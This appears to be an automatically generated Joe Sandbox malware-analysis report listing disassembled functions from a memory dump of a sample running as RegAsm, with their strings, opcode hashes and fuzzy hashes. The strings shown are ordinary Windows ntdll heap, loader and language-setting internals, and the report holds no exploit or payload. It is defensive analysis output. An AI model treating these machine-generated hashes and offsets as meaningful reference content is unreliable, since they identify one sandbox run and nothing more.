                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 7d4844f54f5a89e6359fdbf4e0d17e2834e02f871853a659a9252ef2e601b425
                                                        • Instruction ID: 462e4e532c8f295ad5f519b8ba01d0609f09614e3b087b2f1b1d81cbda8fc13b
                                                        • Opcode Fuzzy Hash: 7d4844f54f5a89e6359fdbf4e0d17e2834e02f871853a659a9252ef2e601b425
                                                        • Instruction Fuzzy Hash: D6128B306406429FDB268F28D465BF7BBE6FF09728F19D459E48A8F641D734E884CB90
                                                        Function 02DFD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                        • API String ID: 0-3532704233
                                                        • Opcode ID: 8d56f8775ab7a19db97dff1bbfe5e318f369ee922313009eff43fb1199eff666
                                                        • Instruction ID: d9bfabfb8f7a46eb2be3e40151b6a002e3ca1bdc77366a557805cca017d848e0
                                                        • Opcode Fuzzy Hash: 8d56f8775ab7a19db97dff1bbfe5e318f369ee922313009eff43fb1199eff666
                                                        • Instruction Fuzzy Hash: EAB18C715483559FC761DF24C440B6BB7EAAB88758F02892EFA89D7340D730DD48CBA6
                                                        Function 02EB0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                        • API String ID: 0-1357697941
                                                        • Opcode ID: b3e2bad5c1249c3afdcd63813fa6010d23fec6424e2878890b4e7a380c21112f
                                                        • Instruction ID: 4a3a2c410f1ff36d5bd202ecc4ddb9a2e1286f2c1d7bb4e0b85543392c7346f9
                                                        • Opcode Fuzzy Hash: b3e2bad5c1249c3afdcd63813fa6010d23fec6424e2878890b4e7a380c21112f
                                                        • Instruction Fuzzy Hash: 88F1EE31A80685EFDB26CF68D050BEBBBF5FF09318F059059E9869B291C730B949CB50
                                                        Function 02E99179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                        • API String ID: 0-3063724069
                                                        • Opcode ID: c7bd9fad35bcf12aab2eba6c30381499524231397c84e512982718bf90070bfe
                                                        • Instruction ID: b12a5ee3b9c25e4673288309c6123143d941735708c4657cf2cc3456bd7bae0e
                                                        • Opcode Fuzzy Hash: c7bd9fad35bcf12aab2eba6c30381499524231397c84e512982718bf90070bfe
                                                        • Instruction Fuzzy Hash: 72D10972884351AFDB21DB54C841BAFB7E9AF84718F04992EFE4497252D770CD48CBA2
                                                        Function 02EB0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-1700792311
                                                        • Opcode ID: a4e03462e8eba5a415d2e9160f843b10edff9cd57fca2e3d73d69ab40c6f47fc
                                                        • Instruction ID: 4c5ea8db1ef4f1f3c8cb03c38372b9293b3379b2df2a87e1fb55db7afacb7b2e
                                                        • Opcode Fuzzy Hash: a4e03462e8eba5a415d2e9160f843b10edff9cd57fca2e3d73d69ab40c6f47fc
                                                        • Instruction Fuzzy Hash: 7BD1EE31980684DFDB62DF68D440AEBBBF2FF4A708F09D059E5469B751C734A984CB24
                                                        Function 02DFD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • @, xrefs: 02DFD313
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02DFD2C3
                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02DFD146
                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02DFD0CF
                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 02DFD196
                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02DFD262
                                                        • @, xrefs: 02DFD2AF
                                                        • @, xrefs: 02DFD0FD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                        • API String ID: 0-1356375266
                                                        • Opcode ID: f42cf71f112c1679c86612d04959b61ed0b4b7a5561f4be98878f0a46327bc06
                                                        • Instruction ID: 33ff7cae3f024445b14f905108949744c0c3a10ed56805df73342795f425bde6
                                                        • Opcode Fuzzy Hash: f42cf71f112c1679c86612d04959b61ed0b4b7a5561f4be98878f0a46327bc06
                                                        • Instruction Fuzzy Hash: 90A1BC719487459FE321CF20D484B9BB7E9BB88719F008A2EFA8896340D774D908CF93
                                                        Function 02E19EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Status != STATUS_NOT_FOUND, xrefs: 02E6789A
                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 02E67709
                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 02E676EE
                                                        • Internal error check failed, xrefs: 02E67718, 02E678A9
                                                        • sxsisol_SearchActCtxForDllName, xrefs: 02E676DD
                                                        • minkernel\ntdll\sxsisol.cpp, xrefs: 02E67713, 02E678A4
                                                        • @, xrefs: 02E19EE7
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                        • API String ID: 0-761764676
                                                        • Opcode ID: 57746861bd2990ad23be636294727b365fec9e556e0c89e0a4ec8a56bf8b355b
                                                        • Instruction ID: 21c72f0f948b9c968c62ed4994e1b226197a41dfb8993c2a817123f26e43af78
                                                        • Opcode Fuzzy Hash: 57746861bd2990ad23be636294727b365fec9e556e0c89e0a4ec8a56bf8b355b
                                                        • Instruction Fuzzy Hash: 19127D71A802149BDB24CF69C894BFDB7B5FF08758F159069E849EB341E734A845CB60
                                                        Function 02E0EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        • API String ID: 0-1109411897
                                                        • Opcode ID: 48c2284fd436d2b7e6e8e503b9c61482d0a6ab460f895a68d26917209d99fef0
                                                        • Instruction ID: 7f6ba0fe0b357e98dbab64385722e8f47bdbf7cbfa3e3adadfc195eff1e44c58
                                                        • Opcode Fuzzy Hash: 48c2284fd436d2b7e6e8e503b9c61482d0a6ab460f895a68d26917209d99fef0
                                                        • Instruction Fuzzy Hash: CFA25B70A8566A8FDB74DF14CC987A9B7B1AF45348F1492E9D80DA7690DB309EC2CF40
                                                        Function 02DFF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 9338e4f9be6c68ac12081626256280d64c6c883943d069b8f6eb05f323a769a5
                                                        • Instruction ID: 5001136d944bed0b384721458b7acd05949679c55e46e777c883ed37a91772f8
                                                        • Opcode Fuzzy Hash: 9338e4f9be6c68ac12081626256280d64c6c883943d069b8f6eb05f323a769a5
                                                        • Instruction Fuzzy Hash: 4742ED312542819FD354CF28C880B2ABBE6FF88308F199969F986CB781D734DD85CB65
                                                        Function 02E0ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                        • API String ID: 0-4098886588
                                                        • Opcode ID: f5e0b0b5c7b168daccd4ae6d81c3a674bb4c7adf38c16b8cbdd771cbd38cba9b
                                                        • Instruction ID: c98218bc97cab2206eac650583c9280ecb4239628f0c31abd31d95e13ca76bd1
                                                        • Opcode Fuzzy Hash: f5e0b0b5c7b168daccd4ae6d81c3a674bb4c7adf38c16b8cbdd771cbd38cba9b
                                                        • Instruction Fuzzy Hash: 4D32B071980269CBDB21CF14C898BEEB7B5BF44748F14A1E9E849A7290D7319EC2CF50
                                                        Function 02E1B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                        • API String ID: 0-122214566
                                                        • Opcode ID: e9c4744dc5735e754e479cbdcef42870c93ff621c3e2cb8486076a4c764fc43f
                                                        • Instruction ID: bd1ec6aba21cef89a37f550af5b171ee357a5f3d54e04ba54303d3aadbb7b199
                                                        • Opcode Fuzzy Hash: e9c4744dc5735e754e479cbdcef42870c93ff621c3e2cb8486076a4c764fc43f
                                                        • Instruction Fuzzy Hash: 18C14731AC02159BDB28DB64C885BBEB7A5AF4530CF14E0BDE906DB680E7B4DC48C791
                                                        Function 02E363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: ae4fbae8966fa2bb1290cd4416719c151611b1cf11709dcc230315918ec2e7ea
                                                        • Instruction ID: dbc902087cd25506e1156dc601e955295061428a088fb738d77eb234f8edac7e
                                                        • Opcode Fuzzy Hash: ae4fbae8966fa2bb1290cd4416719c151611b1cf11709dcc230315918ec2e7ea
                                                        • Instruction Fuzzy Hash: 87918F31FC0350ABEB25EF24E849BAA37B9BF41728F40E468EA15772C0D7709851CB94
                                                        Function 02E3C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 02E781E5
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E3C6C3
                                                        • LdrpInitializeProcess, xrefs: 02E3C6C4
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 02E78181, 02E781F5
                                                        • LdrpInitializeImportRedirection, xrefs: 02E78177, 02E781EB
                                                        • Loading import redirection DLL: '%wZ', xrefs: 02E78170
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: a11257d7a0ba15ee8af97a0291060649cc4cb9feb67277c3f9ea0e9612cae32e
                                                        • Instruction ID: 1afa529bd37b9b784a39ae7ddba8c3cf98cfc26fafc321f496be9f158ce6fcd8
                                                        • Opcode Fuzzy Hash: a11257d7a0ba15ee8af97a0291060649cc4cb9feb67277c3f9ea0e9612cae32e
                                                        • Instruction Fuzzy Hash: 143117717C43419BD214EF28D849E2B77D5EF84B18F049998F9866B391DB20EC08CBA2
                                                        Function 02E32674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02E72180
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02E721BF
                                                        • SXS: %s() passed the empty activation context, xrefs: 02E72165
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02E7219F
                                                        • RtlGetAssemblyStorageRoot, xrefs: 02E72160, 02E7219A, 02E721BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02E72178
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 0d7ef4b226373e72e0d1f3328fa6b937911ef70f3e6b2132a20dbaa059697584
                                                        • Instruction ID: 3ef5573f93f5c71d96356f29cb5274cfbae3217a0370d1ac59072929cb1bf0af
                                                        • Opcode Fuzzy Hash: 0d7ef4b226373e72e0d1f3328fa6b937911ef70f3e6b2132a20dbaa059697584
                                                        • Instruction Fuzzy Hash: B8313732BC021077FB229A949C85FABB779EF54B59F05D059BF4A67200D2709E00C7E1
                                                        Function 02E89C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                        • API String ID: 0-3127649145
                                                        • Opcode ID: e5ef8363bfedef839ffad932ed16ed0f2c2ce4f38c1be5db4dd52c947cf2c3ec
                                                        • Instruction ID: 7e099beda6941e92e55bf5c04947fbe9ecb68ae15b9055c78f862f2cfe3b8634
                                                        • Opcode Fuzzy Hash: e5ef8363bfedef839ffad932ed16ed0f2c2ce4f38c1be5db4dd52c947cf2c3ec
                                                        • Instruction Fuzzy Hash: D2324970A417199BDB21DF65CC88B9AB7F9FF48304F1091EAE54DA7250EB70AA84CF50
                                                        Function 02E19950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                        • API String ID: 0-3393094623
                                                        • Opcode ID: 9bc54f74f9794b4299b3bf59d868462cb6194bca34f789ed05b6e800bbf758e0
                                                        • Instruction ID: 345d951febe50d97e545fbacc41b66a3546f1897bd03e2fc57d1d774420b2b62
                                                        • Opcode Fuzzy Hash: 9bc54f74f9794b4299b3bf59d868462cb6194bca34f789ed05b6e800bbf758e0
                                                        • Instruction Fuzzy Hash: 72025B71588341CFD720CF24C1A4BABB7E5BF88748F44E96EE9998B251E770D844CB92
                                                        Function 02E251EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Kernel-MUI-Language-SKU, xrefs: 02E2542B
                                                        • Kernel-MUI-Number-Allowed, xrefs: 02E25247
                                                        • WindowsExcludedProcs, xrefs: 02E2522A
                                                        • Kernel-MUI-Language-Allowed, xrefs: 02E2527B
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 02E25352
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 2ffa133ab32c5142a12c92df58fc392b9a7b91a078fd991cb7734dd3f3fc94a6
                                                        • Instruction ID: ade75735366bc239f4715b0e33881ded974240e7515fad327df7b2657299295b
                                                        • Opcode Fuzzy Hash: 2ffa133ab32c5142a12c92df58fc392b9a7b91a078fd991cb7734dd3f3fc94a6
                                                        • Instruction Fuzzy Hash: 68F14D72D90629EBCB15DF94C980AEEB7B9EF08754F50906AE502F7210DB709E05CFA0
                                                        Function 02E84F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                        • API String ID: 0-2518169356
                                                        • Opcode ID: d5634c4cfb5ce5bb01f5f97dec7f1caa8cf94e02f047836e04aaa60b7db7edc3
                                                        • Instruction ID: 4b4e20fb9d487de52bef825ea3d35d864297e81d219bee505e0665d7d7a9508e
                                                        • Opcode Fuzzy Hash: d5634c4cfb5ce5bb01f5f97dec7f1caa8cf94e02f047836e04aaa60b7db7edc3
                                                        • Instruction Fuzzy Hash: 0891F472D40A19CBCB21DF59C880ABEB7B1EF48318F999169E84CE7350DB35D901CB90
                                                        Function 02E2D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1975516107
                                                        • Opcode ID: 88da96b8d5b3fb6698493c2bbcfad013eb9d9106ac38a80faffe54da571e40d8
                                                        • Instruction ID: 9382a92673c07dc6bc168e53fc293afdb074c93242711675b9f0a210eb664db5
                                                        • Opcode Fuzzy Hash: 88da96b8d5b3fb6698493c2bbcfad013eb9d9106ac38a80faffe54da571e40d8
                                                        • Instruction Fuzzy Hash: 3D511371EC03558FDB18DF64D88479DBBB2BF44708F54A559EA026B281C7709889CF80
                                                        Function 02DF76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                        • API String ID: 0-3061284088
                                                        • Opcode ID: 818856f5709b52ba00dd246e8f3e394347b3f9468088a4fd49fd0119d290257e
                                                        • Instruction ID: c1ae23e194a11392c30108ebad26e111c049813db7a571f9391cec9cbbe035e2
                                                        • Opcode Fuzzy Hash: 818856f5709b52ba00dd246e8f3e394347b3f9468088a4fd49fd0119d290257e
                                                        • Instruction Fuzzy Hash: B201FC32194690EEF2659719F40AF92F7E4EF46B3CF25805EF9018B7A1CBA49C88C574
                                                        Function 02E170C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 5142960d1016e4da982574e9592d04354a565c7d21e39e9c7b486b7fffc879e7
                                                        • Instruction ID: ed01542ab45af6d395612648a236c55fc48ddbea8279b065deb76d319c42eeea
                                                        • Opcode Fuzzy Hash: 5142960d1016e4da982574e9592d04354a565c7d21e39e9c7b486b7fffc879e7
                                                        • Instruction Fuzzy Hash: 65138D70A406558FEB29CF68C4907A9FBF2FF49708F14D1A9E849AB381D734A945CF90
                                                        Function 02E11070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-3570731704
                                                        • Opcode ID: b93936fb6c3160fc217faa6c7549d45d5703bfe71555a6a27fc2b8f1a87a6109
                                                        • Instruction ID: b5eeb97d07dd1a680f92b441874661e83d82e3dca9c93056c271d5de5ca4691d
                                                        • Opcode Fuzzy Hash: b93936fb6c3160fc217faa6c7549d45d5703bfe71555a6a27fc2b8f1a87a6109
                                                        • Instruction Fuzzy Hash: 1D923A71A80269CFEB24CF14C844BA9B7B6BF45354F15D1E9EA4DAB281D7309E80CF51
                                                        Function 02E1A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02E67D56
                                                        • SsHd, xrefs: 02E1A885
                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02E67D03
                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02E67D39
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                        • API String ID: 0-2905229100
                                                        • Opcode ID: c6da2bf19c3a3416a035d5aade4717110c9fdccf996d6958736ef75392d9b3ea
                                                        • Instruction ID: a03a0bac58293ace062f5eaa4a53f000f2d857955361ed200ea0981277c827e6
                                                        • Opcode Fuzzy Hash: c6da2bf19c3a3416a035d5aade4717110c9fdccf996d6958736ef75392d9b3ea
                                                        • Instruction Fuzzy Hash: 19D18F71A812159BDF24CF98D8C0AFDB7B6FF48318F19A07AE845AB345D3319991CB90
                                                        Function 02E13D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
